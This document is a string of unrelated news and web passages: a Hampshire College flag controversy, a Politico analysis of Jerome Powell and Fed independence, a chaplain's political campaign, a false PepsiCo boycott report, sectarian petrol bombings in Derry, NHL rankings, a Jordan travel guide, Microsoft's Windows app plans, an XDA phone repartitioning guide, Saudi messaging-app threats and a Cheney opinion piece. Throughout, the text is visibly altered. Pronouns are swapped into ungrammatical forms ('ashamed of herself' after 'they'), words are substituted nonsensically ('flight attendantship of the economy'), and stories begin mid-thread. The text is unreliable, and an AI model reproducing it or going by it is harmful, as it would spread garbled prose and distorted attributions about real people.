Hampshire 's decision to keep the flag down received condemnation from public officials , including Springfield Mayor Domenic Sarno , Westfield State Representative John Velis , and Senate President Stanley Rosenberg . Members of the national media descended upon Amherst , raising the profile of the story .
Lash had a confrontation earlier this week with Fox News personality Jesse Watters , who came to their home and questioned them as they came out of their car and at the door to their home . Speaking to 22News reporter Kait Walsh Friday morning , they described the incident as a `` little home invasion . ''
Nunez Ortiz said that although the flag is back up , there will still be a rally in support of the Stars and Stripes this coming Sunday . They said that in addition to celebrating the flag , the rally will commemorate the 75th anniversary of the attack on Pearl Harbor , which is next Wednesday .
While the controversy was going on , Lash stressed that the removal of the flag was temporarily , though they did not say whether its absence would become permanent . An American flag remained flying at the Hampshire College Police station , even while the flag on the main pole was down .
Lash released the following statement Friday morning :
Jerome Powell , President Donald Trump 's nominee to chair the Federal Reserve , is both a Republican and an Obama appointee . | Drew Angerer/Getty Image How Jerome Powell can save the Fed from Trump Powell is expected to remain a firm advocate for Fed independence , though Mnuchin backed them as a pick over whom they hoped they could exert some influence .
Jerome Powell , President Donald Trump 's nominee to chair the Federal Reserve , faces multiple risks as they prepare to take flight attendantship of the economy . Among the biggest : the threat of being publicly criticized by the president himself .
The Fed zealously guards its ability to make monetary policy decisions free from short-term political pressures , a key feature of its structure . But the president has already proved willing to buck tradition by targeting the central bank , and its chair , in the bluntest terms on the campaign trail .
Story Continued Below
“ She 's very political , and to a certain extent , I think they should be ashamed of herself , ” Trump said of Fed Chair Janet Yellen in a CNBC interview in September 2016 . During a presidential debate that same month , they accused Yellen of artificially propping up the economy with low rates .
Now , with the economy showing new strength and stocks hitting record highs , if a Powell-led Fed responds by accelerating interest rate hikes , the president could be provoked to speak up again . And Powell would have to rely on their relationships on Capitol Hill , as well as with Treasury Secretary Steven Mnuchin , to help ward off any such attacks .
Since Trump 's election a year ago , the Fed has grappled with the possibility that the president could publicly criticize the central bank , plunging it into an uncomfortable political spotlight .
“ The Fed needs a good reputation , and its credibility matters , ” said Sarah Binder , a political science professor at George Washington University .
“ If you have criticism coming in from Trump and coming in from Congress , … there will always be questions about whether the Fed will succumb in any type of way or be diverted from its policy prescriptions , ” they added . “ That makes it harder for monetary policy to work . ”
Certainly , the central bank 's best defense against attacks is to keep the economy on an even keel . But if conditions turn sour over the next few years — a real possibility given that the current expansion is already the third-longest in U.S. history — the Fed would be an easy target . And the president has n't shied away from criticizing even their own appointees , as Attorney General Jeff Sessions and others have discovered .
The most reliable politics newsletter . Sign up for POLITICO Playbook and get the latest news , every morning — in your inbox . Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO . You can unsubscribe at any time .
If the president is unhappy with the Fed 's performance , they could also use additional appointments to shake up the central bank .
As a result , the Fed spends considerable energy figuring out how to stay out of politics and preserve its independence .
Its ability to do so will likely soon sit squarely on the shoulders of Powell , who will not only have to guide decisions that affect the economy but also defend them to Congress and the public . Their confirmation hearing before the Senate Banking Committee is set for Tuesday .
While Trump criticized the Fed more stridently than any major presidential contender in modern history , congressional Republicans have taken aim at the central bank for years . One GOP lawmaker says the key is for the chair to convey their intentions effectively .
“ The better the Fed communicates its policy trajectory , both to the public and to Congress , the more it is going to be able to achieve that independence that many Fed officials want , ” Rep. Andy Barr ( R-Ky. ) , who chairs the House Financial Services subcommittee on monetary policy , said in an interview .
Powell is both a Republican and an Obama appointee , providing them with bipartisan support that might help fend off threats to the central bank . A member of the Fed board since 2012 , he 's more sympathetic to Republican calls for a simpler rulebook for banks yet also more in line with Yellen on interest rate policy .
They would also come into the job with a fair number of relationships on the Hill already ; between January and September , they met with 13 senators and multiple House members . And since their nomination as chair , they have had a flurry of additional conversations .
“ I think very highly of Jay , ” Barr said . “ He and I have gotten a chance to know each other through an informal breakfast meeting and other meetings in my office . ”
Still , although criticism from the president could undermine public support for the institution , the bigger worry for the Fed is the potential for those criticisms to carry over to congressional action .
The central bank is perpetually involved in a delicate dance with Congress . It has the freedom to set interest rate policy as it sees fit to achieve the dual goals that Congress has given it : price stability and maximum employment .
But the Fed was created by Congress , meaning some of its powers could theoretically be taken away by the legislators . So the chairperson must remain on good terms with congressional leaders while not paying heed to whatever short-term policy action the lawmakers would like to see .
`` Every Fed chair understands at their or their core that their job is to protect the independence of the Fed , and one of the ways you do that is by maintaining a good relationship with the Congress , '' said Laurence Meyer , a former Fed governor who now heads a policy analysis firm .
`` Of course , if Congress views the Fed 's performance as seriously lacking , it is more likely to implement reforms that the [ Fed ] thinks would be damaging to the pursuit of its congressionally mandated objectives , ” they added .
House Republicans in particular have sought to have a greater window — and , the Fed worries , more influence — on monetary policy decision-making . The Financial Services Committee this month approved three bills along those lines , including one requiring the central bank to explain whenever it deviates from a strategy .
Barr says this type of clarity will actually protect the central bank from attack because it will help Congress understand where the Fed is going .
“ In the last year , there has been a very noticeable effort to respond to some of the concerns that members of Congress have had in asking for greater clarity and communications ” as the Fed begins to pull back some of its extraordinary support for the economy , they said .
But the more power the Fed aims to use , particularly on the regulatory side , the more it should expect Congress to weigh in , they said .
Yet concrete Fed reform would be hard to achieve . That 's because while most lawmakers would like to make changes to the central bank , there 's no consensus as to what those changes should be .
Powell could help keep it that way in a Republican-majority Congress .
“ I do think that you 're going to see — and you already have seen this — fewer calls for more congressional oversight over the Fed , and fewer complaints about Fed governance , and fewer complaints about the Fed , broadly speaking , at least as long as the economy is OK , than you did when Yellen was there , ” said Ian Katz , an analyst with Capital Alpha Partners .
The Fed 's relationship with Congress and the administration could also change simply because Powell has a different personality than Yellen 's . Their low-key style is perhaps more suited to the type of political schmoozing that they politely engaged in only when necessary .
Morning Money Political intelligence on Washington and Wall Street — weekday mornings , in your inbox . Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO . You can unsubscribe at any time .
They also got to know members of Congress in 2011 , when they were a fellow at the Bipartisan Policy Center and met with numerous Republicans to convince them of the dire consequences of not raising the debt ceiling .
Powell is expected to remain a firm advocate for Fed independence , though Mnuchin backed them as a safe pick over whom they hoped they could exert some influence .
“ I think Mnuchin or anyone in the administration that thinks they 're going to have influence over Powell is going to be disappointed , ” Katz said .
And if the president does decide to go on a public campaign against a Powell Fed ?
“ That would obviously be awkward and uncomfortable , ” Katz said . “ The Fed would n't be happy with it , but I think they would just keep on doing what they 're planning on doing . ”
A disgraced former Navy Chaplain who blames demonic spirits for political and social issues they do n't support is running for elected office .
Gordon “ Dr . Chaps ” Klingenschmitt announced Tuesday that he 's running in the Republican primary for the 15th District seat in Colorado 's State House .
They released an 8-minute , 44-second video asking voters to support them in their race , but they decline to mention some of their controversial stances , including their recent claims that Jesus wants their followers to sell their clothes and buy a gun and the Affordable Care Act causes cancer .
Klingenschmitt also claims to have successfully performed an exorcism on a lesbian soldier and tried to exorcise demonic spirits from President Barack Obama .
The Christian broadcaster explained to voters in their video that they oppose “ gun-grabbing laws ” and abortion and favors private school vouchers .
Klingenschmitt has said that United States law should be based on biblical laws , and they were reprimanded by the U.S. Navy for disobeying orders in 2006 .
“ When I swore that oath to defend the Constitution against foreign and domestic enemies I took it very seriously , ” Klingenschmitt said in their video . “ And when the Secretary of the Navy began censoring the prayers of the chaplains , saying , ‘ Oh , you ca n't pray in Jesus ' name , ' I took a stand , and my stand actually cost my career . ”
Klingenschmitt had been a vocal critic of a since-rescinded policy requiring chaplains to offer nonsectarian prayer , but they were actually reprimanded in 2006 for disobeying orders .
A court-martial jury convicted them of disobeying direct orders not to attend political events in uniform .
Klingenschmitt had participated March 30 , 2006 , in a rally outside the White House in their dress uniform alongside former Alabama chief justice Roy S. Moore to protest the Navy policy on prayer .
They were issued a formal reprimand and docked 12 months pay , although they left the Navy before that period ended .
The newest Pepsi challenge ? Dealing with a consumer boycott based on fake reports about its CEO 's alleged views on Trump .
Trump supporters are vowing to snub PepsiCo ( PEP ) products ranging from Doritos to Tropicana because of false reports that CEO Indra Nooyi told Americans who voted for them to “ take their business elsewhere. ” The claim is false , according to rumor debunking site Snopes.com . Reports of their comments are circulating on social media sites such as Twitter and Facebook , with users posting articles from conservative blogs and websites .
Facebook , Google trying to stop spread of fake news
The boycott comes amid rising concern about the spread of false reports from bogus news sites and how they may have impacted the election . BuzzFeed News concluded that fake clickbait headlines drew more readers than real articles during the last three months of campaign coverage .
Although Nooyi did address the election results in an interview with New York Times writer Andrew Ross Sorkin , they congratulated Trump on their victory ( see the interview below ) . But the executive noted that some of their employees had expressed concern about their civil rights following the campaign , which included Trump 's boasts about sexual assault .
“ I do n't think there 's a place for that kind of language in any part of society -- not in locker rooms , not in football players ' homes , not in any place , ” Nooyi said . “ And , if we do n't nip it in the bud , Andrew , this is going to be lethal force that 's going to take over society . ”
They added , “ The process of democracy happened . We just need to let life go on . ”
PepsiCo did n't immediately return a request for comment .
As evidence emerges about the role of deceptive and fake reports on social media , Google and Facebook both said they would restrict ads from fake news sites , cutting off their sources of revenue .
The fake reports about PepsiCo were widespread on Twitter as of Thursday morning . Trump supporters also claimed that PepsiCo 's recent decline in its share price is tied to their grassroots campaign , although a dip came after several cities and counties approved soda taxes in November , which is viewed as negative for the soda industry .
PepsiCo is n't the only consumer brand to face the ire of Trump supporters . GrubHub is facing condemnation from Trump voters after its CEO condemned bigoted views following the election . The food-delivery service 's chief executive , Matt Maloney , has denied reports that they suggested employees who hold racist or anti-immigrant views resign from the firm .
Ivanka Trump zinged over marketing of bracelet worn on 60 Minutes
Other brands Trump supporters are vowing to boycott include Macy 's , Oreos , Amazon.com , Dell , the NFL , Netflix , Ben & Jerry 's and Starbucks , according to a Reddit thread that is keeping a tally . The list also includes those brands they believe should be supported , such as New Balance . An executive at the shoe company recently said that it believed the country would “ move in the right direction ” under Trump 's presidency .
Interestingly , the pro-Trump boycott has some overlap with the anti-Trump # GrabYourWallet movement , which has asked consumers who do n't agree with Trump 's policies to stop shopping at companies that sell Trump-related items . Those include Amazon.com and Macy 's , which are also on the Trump-supporters ' list of corporations to avoid patronizing .
Yet the # GrabYourWallet campaign has a goal that 's wider than simply registering protest against Trump 's policies . It also seeks to highlight the unusual conflicts of interest that have been created by Trump 's victory .
Specifically , the campaign 's supporters point to Ivanka Trump 's hawking of their clothing and jewelry after appearing on TV or in campaign events in support of their father , which co-founder Shannon Coulter told CBS MoneyWatch is an example of Ivanka Trump 's “ crass commercialism . ”
For corporations caught in the crossfire , it shows that treading into politics can be an unprofitable proposition .
Terry Firma
The Troubles may be coming back in Northern Ireland .
Kevin Campbell , the mayor of Derry City , told a local news team that
dissident ( Catholic ) republicans were manipulating mobs of up to 50 children and having them throw dozens of petrol bombs at the minority Protestant community after the death of former Prime Minister Margaret Thatcher last week . The Protestant enclave , the Fountain Estate , consists of 400 families surrounded by a two-to-three mile security barrier in the mainly Catholic west of the city . Mr Campbell said the attacks on the estate were “ absolutely disgraceful ” . They added : “ There must be a sinister element involved when 25 petrol bombs are thrown — children aged nine to 15 would not know how to make petrol bombs . ”
Resident William Jackson said petrol bombs have been coming within 2-3 feet of their house . “ After seven nights of mayhem we have seen only one arrest , ” they said . “ We feel under siege 24 hours a day . … They call us Orange Huns and say things like , ‘ We are going to burn you out ' . I get phone calls at 2-3am saying they are going to burn me out , shoot me in the head and watch my family cry . They are not going to be happy until we are out . It is ethnic cleansing , just sectarian thuggery . ”
The “ Orange Huns ” moniker refers to a battle the Protestants fought alongside Dutch Prince William of Orange against Catholic English king James II — in 1690 .
In matters of politics and religion , grudges may hibernate , but they rarely die .
[ art by Bansky via UK Street Art ]
The St. Louis Blues remain at the top of the TSN.ca NHL Power Rankings , ahead of the Tampa Bay Lightning and Chicago Blackhawks .
One regulation loss in the past six games has the Blues gaining ground on the slumping Nashville Predators in the Central Division , and the Blues have the best per-game goal differential ( 0.56 ) in the Western Conference .
Tampa Bay has won four straight and seems to have the depth to withstand any potential injury problems .
Chicago is n't firing on all cylinders , but has one regulation loss in the past six games , and it was at Tampa Bay .
The big climber this week , the Ottawa Senators , continue to ride a red-hot goaltender from 18 to 15 .
Heading the other way , the Montreal Canadiens drop from five to 10 following a stretch with one regulation win in five games . Also slipping , the Winnipeg Jets go from 14 to 17 as they are forced to play without injured centre Bryan Little and defenceman Dustin Byfuglien .
For other Canadian teams , the Vancouver Canucks are up one spot , to 16 , with a healthier defence . The Calgary Flames continue to walk the high wire , defying the odds , and sit at 21 , down one from last week .
The Toronto Maple Leafs continue to sink , from 27 to 28 , but they have n't yet been able to catch the Edmonton Oilers , who remain at 29 .
Jordan ( Picture : Getty Images/Metro.co.uk/Myles Goode )
When you think of adventure holidays , Jordan may not be the first country to come to mind .
But in the heart of the Middle East , Jordan , or as it is officially known The Hashemite Kingdom of Jordan , is a country filled with wonders waiting to be explored .
Whether you decide to go via a tour group or hire a car and make the trip as an intrepid traveller , there are a number of treasures to be discovered – and there 's one heck of a beach experience waiting for you at the end .
So here are 13 reasons why Jordan should be your next adventure trip – and it can all be done in one week .
1 . Petra
Named one of the new seven wonders of the world , Petra is an ancient city famed for its rock-cut architecture and an impressive water conduit system .
It 's hard to believe quite how vast the site is until you get there ; it can take up to two weeks to explore the entire site so give yourself at least one full day to wander down and back through one of the main routes .
The Facade of the Treasury ( Picture : Jordan Tourism Board )
Petra is a four-hour road trip from the capital city of Amman , where all flights arrive .
Advertisement
Advertisement
If it looks familiar it 's because Indiana Jones And The Last Crusade was filmed here .
But it 's more than just spotting where Indy rode out their horses – just wait until you get about about an hour 's walk into the site .
You 'll discover the Facade of the Treasury , the first main port of call for visitors .
It 's a stunning ruin , carved into the sandstone , that sits at the end of a narrow gorge .
As it comes into view it is breathtaking .
The Urn tomb , part of the Royal tombs ( Picture : Getty )
The face of the structure is marked by hundreds of bullet holes made by the local tribes that hoped to dislodge riches that were once rumored to be hidden within .
Qasr al-Bint temple ( Picture : Getty )
Further on in to the site , there are plenty of archaeological digs still being undertaken as historians try to understand more about the site and how it was used by the Bedouin tribe , who once upon a time lived in the caves .
A group of camels stands in front of the ancient carvings in Petra
Although they have now been moved off the site , the Bedouin still live and work in the area , and many of the young boys and men will attempt to charm you into buying their wares .
But do speak to Marguerite van Geldermalsen , a New Zealand backpacker who in the 1970s met Mohammed Abdullah , a Bedouin in Petra and fell in love , settling down in the caves of Petra and raising a family .
Advertisement
Advertisement
It 's an incredible story . Five decades on they remain living with the tribe .
2 . Star gaze in the desert
Nothing beats sitting under the stars with friends and loved ones .
Down in Wadi Rum – it 's English translation is Valley Of The Moon – there are numerous camp sites offering all kinds of accommodation from the basic to your luxury , and it offers some of the best night sky views I 've ever seen .
Just make sure you pack a warm jacket as it gets chilly out in the middle of nowhere . # mum
The stars at Wadi Rum ( Picture : Getty )
Wadi Rum is about an hour 's drive south of Petra and Captain Camp also offer camel rides as well as exhilarating jeep trips across the dunes .
And you do not want to miss their entertainment .
3 . Camel racing
You read that right . It 's one of the craziest things you may ever see – grown men in trucks screaming at herds of camels who are racing for their lives around a track – but it 's also absolutely brilliant .
Camels really are n't all that elegant .
To view this video please enable JavaScript , and consider upgrading to a web browser that supports HTML5 video
Alternatively , you could always just take a camel ride to watch the sunset .
Advertisement
4 . Amman
The capital city of Jordan , all flights land in Amman so you may as well kick off your trip with a visit to one of the most stunning spots in the city – the Citadel .
With great views across the city , it is also the perfect spot to watch the sun rise or set , and to sit and listen to the city-wide call to prayer .
The view of Amman from the Citadel ( Picture : Getty )
This area is thought to be one of the oldest continuously inhabited places in the world , with the Roman , Byzantine , and Umayyad periods all leaving their trace on the place .
Make sure you visit the Temple of Hercules , a Byzantine church , and the Umayyad Palace .
Temple Of Hercules ( Picture : Getty )
5 . The Dead Sea
The infamous Dead Sea is bordered by Jordan and Israel and it has to be experienced to be believed .
You really do float and it really does sting if you have any cuts .
The Dead Sea in Jordan ( Picture : Getty )
A place of refuge for King David in the Bible and one of the world 's first health resorts for King Herod , it is the lowest elevation point of Earth .
It 's also the deepest hypersaline lake in the world with a salinity of 34.2 % – it is 9.6 times as salty as the ocean .
The Dead Sea ( Picture : Getty )
This is also where you can cover yourself in mud to your heart 's content – and it 's really good for you .
Because of the high content of salts and minerals in the mud , several studies have claimed there are health benefits for the skin .
Advertisement
It 's also just really , really fun .
Dead Sea ( Picture : Getty )
It 's best to save the Dead Sea for the end if your trip .
Not only is it positioned about an hour outside of Amman but with spa hotels dotting the coast and making the most of the local mud , it 's the ideal place to relax around the pool after a week of the dusty desert .
6 . The people
You do n't know kindness until a complete stranger spends 15 minutes chasing a harmless lizard around a tent for you because you 're too scared to sleep with it in your room .
As we traveled across the country we encountered nothing but kindness , and locals who love to introduce visitors to their customs and traditions .
Never was this made clearer than when our tour guide decided it would be a good idea for us to gatecrash a group of Bedouin men setting up for a wedding celebration .
Bedouin elders preparing for a wedding ( Picture : Aine O'Connor )
As the young boys spoke , eager to show off their English skills , the elders sat silent as Mohammed our guide translated our questions with regards to the celebrations – where was the groom ? ( Being groomed in the salon ( this may have been a joke ) , where were the women ? ( In another tent – the men and women remain separate until the groom visits the bride later in the evening . )
Then there were the tribesmen in Wadi Rum who put on an evening of traditional music and dancing for us to enjoy , and then revealed the secrets of how they cook their lamb to perfection .
To view this video please enable JavaScript , and consider upgrading to a web browser that supports HTML5 video
Under the sand is the key .
Arabic coffee Coffee is always offered to guest as soon as you enter someone 's home or event , and it is rude to turn it down . Sorry tea drinkers . Although black , it is sweet and offered in such small quantities that it remains manageable and you just need to shake the cup to indicate that you would not like more .
7 . The houmous
The houmous , oh the houmous .
You have n't tried houmous until you 've eaten it in Jordan .
Houmous ( Picture : Getty )
From restaurants in the capital of Amman to dishes of the spread on a buffet table in the desert , the houmous is freshly-made and deliciously creamy , and when paired with any of the numerous breads also on offer , it can easily be too late before you 've realised you do n't have any room left for the main course .
Jordanian food is very similar to other Levantine food , so you can expect lots of olives , tabbouleh , and baba ghanoush , all of which is readily available for every meal .
Including breakfast .
Fattoush ( Picture : Getty )
Fattoush , a bread salad made from fried pieces of pitta combined with mixed greens and veggies such as radishes and tomatoes , is another firm favourite , along with of course kebab , shawarma , and falafel .
Traditional Jordanian lentil soup recipe At Petra Kitchen you can learn how to make local dishes including fried tomatoes and lentil soup . Ingredients 6 cups water 1 onion , finely chopped 1/2 teaspoon of cumin A dash of pepper 61 cups of brown lentils 1/2 teaspoon of salt 1/4 cup of olive oil or ghee 1/2 cup chopped parsley Croutons to garnish Method Rinse the lentils and drain before placing in a saucepan over a medium heat . Bring to the boil . Reduce the heat and let it simmer for 30 minutes before removing the pan from the hob and straining the lentils . Return the pureed lentils to the pan and add cumin , salt and pepper – cook over a medium heat . Brown the onion in your oil or ghee , and then add to the pan , cooking the lentils and onions for a further five minutes . Sprinkle your soup with parsley and croutons .
8 . The shisha
Alcohol is rarely drunk in Jordan but EVERYONE smokes the shisha – or the hubbly bubbly as many of them like to call it .
Shisha lounge in Amman ( Picture : Getty )
Shisha lounges can be found 10 to the dozen in Amman – visit Rainbow Street for the best shisha nightlife – but even out in the desert it is widely available .
Try the Two Apples .
9 . This view from inside Petra
The view from inside Petra ( Picture : Rebecca Lewis )
10 . This view of the Holy Lands
A view of the Holy Land from Mount Nebo .
Taken from Mount Nebo where the prophet Moses was apparently given their first view of the promised land .
11 . And this one of Wadi Rum
Wadi Rum ( Picture : Jordan Tourism Board )
12 . And look at this one of the old town of Amman
Old Amman ( Picture : Jordan Tourism Board )
13 . There is a high threat from terrorism , but I felt as safe as I do in London
Yes , Jordan is bordered with Iraq , Syria , Saudi Arabia , and Israel , but it prides itself on basically being the Switzerland of the Middle East .
You are not allowed to get any closer than 3km from the Syrian border ( but why would you want to anyway ? ) , all the big hotels have security check points for people and luggage before you can even enter the lobby , and there are security police at all major landmarks .
London , Paris , Brussels , Orlando , Istanbul – all have been affected by terrorism in recent years but we should n't let terrorists win by scaring us away from some of the most gorgeous and fun places on Earth .
Jordan is one of those places .
British Foreign Office advice The Foreign and Commonwealth Office ( FCO ) advise against all but essential travel to within 3km of the entire Syrian border . This is due to the risk of small arms fire , stray mortars , or other attacks in the area . There is a high threat from terrorism . Attacks could be indiscriminate , including in places frequented by foreigners like large hotels , shopping malls and supermarkets . There is considered to be a heightened threat of terrorist attack globally against UK interests and British nationals , from groups or individuals motivated by the conflict in Iraq and Syria . You should be vigilant at this time .
Jordan dos and donts Do stand when greeting others Do accept Arabic coffee when it is offered to you Do round up your taxi bill to the nearest tenth and tip your waiter 10 % gratuity Do haggle when shopping in the markets Do dress conservatively when exploring Jordan – keep your shoulders covered and men and women should both wear trousers , shorts or skirts longer than the knee Do feel free to drink alcohol – but not in public outdoor places Do n't interrupt or pass in front of a Muslim who may be praying in public Do n't feel uncomfortable about the outrageous amount of food that may be offered to you – Arabs tradtionally view food as a symbol of hospitality and generosity . Do n't feel like you must tip a taxi driver although it is always appreciated
How to get there
British Airways and Virgin both fly to Jordan , however Royal Jordanian flies daily from London Heathrow to Queen Alia International Airport , Amman .
Return fares start from £501pp inclusive of taxes .
Where to stay
In Amman – double rooms at the Grand Hyatt Amman start from £224.00 per night
In Petra – double rooms at Movenpick Hotel & Resort start from £45.00 per night
In the Dead Sea – large double rooms at Crowne Plaza Dead Sea start from £85.00 per night
In Wadi Rum – a private tent at Captain Camp starts from £98.00 per night
Guided tours
Cox & Kings offer group tours starting from £1,475 per person including return flights from the UK .
The tour includes Mount Nebo , Wadi Rum , Petra and other highlights including Aqaba .
Abercrombie & Kent offer group tours starting from £1,495 per person including return flights from the UK .
The tour includes the above highlights as well as the well-preserved city of Jerash , Madaba and Kerak 's Crusader castle .
MORE : Weekend breaks : Eight things to do in Vienna that should make it the next stamp in your passport
MORE : Solent Forts between Portsmouth and the Isle Of Wight – the most unexpected of British seaside holidays
MORE : Not LA or Hollywood : Silicon Valley , Santa Cruz , Monterey and the other California you need to see
Microsoft has a four-fold plan to close Windows Phone 's infamous 'app-gap ' problem . At its ongoing developer conference , Build 2015 , the Redmond-based company announces that it is making it easier for developers to bring their apps to the Windows Phone platform .
The first way is to entice Web developers to wrap their sites into apps and release them on the Windows Store . The second -- arguably , the least exciting -- is to make Windows apps the traditional way -- using existing Win32 , .NET WinForms and other Windows development technologies .
Which brings us to the most exciting -- and controversial -- parts . Microsoft is allowing Android and iOS developers to take their apps and port them to Windows . Called Project Islandwood , Microsoft is providing iOS developers with an Objective C tool and middleware layer to provide the operating system APIs that iOS apps need to run . The company says that developers will only have to put in a `` few percent '' of tweaks to get their iOS apps running on Windows 10 for phones .
Similarly for Android , the company is preloading an Android runtime layer to Windows 10 for phones which will enable them to run existing Android apps . Called Project Astoria , this puts even less work on developers ' shoulders . All they need to do is publish their APK files to Windows Phone Store , and as long as it complies well with Astoria 's API , things should run fine , Microsoft says .
Things are n't all sorted just yet . As Microsoft notes , Astoria does n't provide a complete set of APIs , so not every app -- I 'm looking at you , Google Mobile Services -- will work well on the Windows 10 for phones-powered devices . We 'll see that in coming months .
What do you think about this move ? Do you think Microsoft is going bonkers with introducing support for Android apps to Windows platform ? Do you think it is the right way to lure developers ? Share your views in the comments section below !
Photo Credit : Slavoljub Pantelic/Shutterstock
Code : Model : MMC VTU00M ( sd/mmc ) Disk /dev/block/mmcblk0 : 15.8GB Sector size ( logical/physical ) : 512B/512B Partition Table : gpt Number Start End Size File system Name Flags 1 4194kB 8389kB 4194kB BOTA0 2 8389kB 12.6MB 4194kB BOTA1 3 12.6MB 33.6MB 21.0MB ext4 EFS 4 33.6MB 41.9MB 8389kB PARAM 5 41.9MB 50.3MB 8389kB BOOT 6 50.3MB 58.7MB 8389kB RECOVERY 7 58.7MB 92.3MB 33.6MB RADIO 8 92.3MB 1166MB 1074MB ext4 CACHE 9 1166MB 2777MB 1611MB ext4 SYSTEM 10 2777MB 3364MB 587MB ext4 HIDDEN 11 3364MB 3372MB 8389kB OTA 12 3372MB 15.8GB 12.4GB ext4 USERDATA
Is there any risk ?
Are there any disadvantages ?
Which types of packages that I can not install via Odin after Re-partition ?
What is gon na happen if I install an Official ROM via Odin after Re-partition ?
Which device that I can do repartition ?
Screenshots
Guide
* You have to use the latest Philz Recovery on this operation . You can go back your favorite recovery again after repartition . And I am not responsible for any problems that on your device !
external
Code : Model : MMC VTU00M ( sd/mmc ) Disk /dev/block/mmcblk0 : 15.8GB Sector size ( logical/physical ) : 512B/512B Partition Table : gpt Number Start End Size File system Name Flags 1 4194kB 8389kB 4194kB BOTA0 2 8389kB 12.6MB 4194kB BOTA1 3 12.6MB 33.6MB 21.0MB ext4 EFS 4 33.6MB 41.9MB 8389kB PARAM 5 41.9MB 50.3MB 8389kB BOOT 6 50.3MB 58.7MB 8389kB RECOVERY 7 58.7MB 92.3MB 33.6MB RADIO 8 92.3MB 193MB 101MB ext4 CACHE 9 193MB 1805MB 1612MB ext4 SYSTEM 10 1805MB 1820MB 15.0MB ext4 HIDDEN 11 1820MB 1828MB 8000kB OTA 12 1828MB 15.8GB 13.9GB ext4 USERDATA
Hello XDA communityI 'm using my GT-I9300 via reparititoned table for 4 months and it 's working very well and very useful for Custom ROM users like us.Here 's stock 16 GB GT-I9300 has a partition table ; As you can see , Samsung give 1GB to /cache partition and ~587MB to /preload partition . If your phone is out of OTA update service ( if your phone is rooted , it 's already out of OTA ) they 're the most useless things in your device.The system downloads Android OTA updates to /cache . If you want update yourphone 4.1.2 to 4.3 via OTA , the device needs to have enough space for store the update . That 's why /cache partition is so big . But , if your device is rooted ( or you 're using a custom ROM ) , that does n't matter because the device is out of OTA update service already.It 's just only for Samsung 's craps . It only has a ringtone , and a video called Nature of .... ( I do n't remember the video name ) .If you are a Custom ROM user or using device with root , you do n't need those sooo big partitions . You should resize them.You will shrink those useless partitions and give more space to /data ( User data ) partition.Of course . Re-partition an Android device is one of the most dangerous thinks.Yes . If you 're done this guide and resize your partitions , you ca n't install any Official ROM via Odin.You ca n't install Official ROMs ( downloaded from sammobile.com , samsung-updates.com , etc ) . But you can install kernels , modems , bootloaders , recoveries via Odin without any problem.Your device will be semi-bricked . Recovery can not mount & format some partitions . But you can restore/unbrick your device with PIT file.16 GB of GT-I9300 only . Please do n't try it to other devices.Of course . You can do anything like before on your device with Custom Recovery . You can install anything like always.Yes , in second post.Your device will be freshed after repartition , so you should make Nandroid Backup and backup your internal sdcard.1 - Download `` repart_16GB_GT-I9300_CWM.zip '' or if you use AOSP and you hate sammy ROMs , download `` repart_16GB_GT-I9300_CWM_AOSPv2.zip '' from attachments and copy it tosdcard.2 - Make sure that you backup everything on your device3 - Boot to recovery ( The Latest Philz Touch ) 4 - Install the zip file you 've downloaded . After installation , device will reboot to recovery automatically.5 - You can see some mount errors while booting recovery . Do n't panic.6 - Wipe Data/Factory Reset -- > Clean to Install a New ROM ( You may see some error , do n't worry ) 7 - Mounts and Storage -- > format /data and /data/media ( /sdcard ) 8 - Bingo ! Restore your system , or install a ROM.That 's it ! After doing repartition ( not AOSP one ) , your partition table will be ; As you see , we have +1.5GB on USERDATA partition .
Saudi Arabia is threatening to block several popular Internet chat , call , and messaging services if they do n't get in line with the country 's regulatory requirements .
The apps in question include Skype , WhatsApp , and Viber , according to the country 's official news agency SPA .
Apparently , the Saudi Arabian Communications and Information Technology Commission issued a statement that said , `` The Commission emphasizes that it will take appropriate action regarding these applications and services in the event of failure to meet those conditions . ''
It 's unclear exactly what rules the apps were breaking , but local media reports from earlier in the week said that the government wanted to be able to monitor the apps , according to CNN .
This may have to do with recent political protests that were reportedly partially organized through WhatsApp , according to CNN . Demonstrations are against the law and completely banned in Saudi Arabia .
`` I 'm not angry , just a little surprised that the Saudi government has n't advanced beyond this type of tactic , '' prominent Saudi blogger Eman Al-Nafjan told CNN . `` I thought that they were better able to do this without resorting to have to threaten banning applications . ''
This is n't the first time that the Saudi Arabian government has cracked down on messaging apps . In 2010 , the country temporarily banned BlackBerry messenger services after Research In Motion reportedly did n't adhere to the country 's regulatory requirements .
Similar to the current threats against Skype , WhatsApp , and Viber , the Saudi government complained at the time that the encrypted security used in the BlackBerry network prevented the government from monitoring communications channels , which it said could be used to threaten national security .
Despite the government threats to ban the apps , Skype , WhatsApp , and Viber have not yet been shuttered , according to local news source Al Arabiya .
Dick Cheney has more very sober-minded thoughts .
Every so often Dick Cheney will appear in public to vocalize their latest irritable mental gesture . Today they appeared with right-wing radio host Hugh Hewitt to assert the following : “ I vacillate between the various theories I 've heard , but you know , if you had somebody as president who wanted to take America down , who wanted to fundamentally weaken our position in the world and reduce our capacity to influence events , turn our back on our allies and encourage our adversaries , it would look exactly like what Barack Obama 's doing . ”
Cheney 's regular utterances tend to meld together into an undifferentiated belligerent growl , but in this case they are ( inadvertently ) telling us something useful . The former vice-president is endorsing , or at least half-endorsing , the right-wing belief that to dismiss Barack Obama as a naif and a failure is far too kind . No , Obama is carrying out a secret plan to undermine American power . Versions of this theory have been fleshed out by such figures as Rush Limbaugh , Rudy Giuliani , and Dinesh D'Souza . They hold that Obama , driven by well-hidden black rage , seeks to humiliate the country that has oppressed African-Americans . This line of thought , while too deranged for Republican leaders to publicly endorse , has a great deal of influence among conservatives . Cheney 's comments serve as the latest illustration of the delusional paranoia running through even the very highest levels of the Republican Party .
Cheney 's logic also helpfully ( and , again , inadvertently ) illustrates the dilemma surrounding the current debate over Iran 's nuclear program . Like all Republican officeholders and some Democratic ones , Cheney thinks Obama has struck a weak deal with Iran . Unlike most of them , Cheney suspects Obama has done so not out of naïveté but out of a cunning plan to actually encourage the Iranian nuclear program .
But what if we apply Cheney 's analytic method to their own administration 's Iran policy ? After all , it was under the Bush administration that the Iranian nuclear program flourished , bringing the regime from 164 to 8,000 centrifuges . Even so hawkish a figure as Lindsey Graham concedes that the previous administration utterly botched the task of preventing a nuclear Iran . ( “ I think the Bush administration , they were a miserable failure when it came to controlling Iran 's nuclear ambition , ” Graham said . )
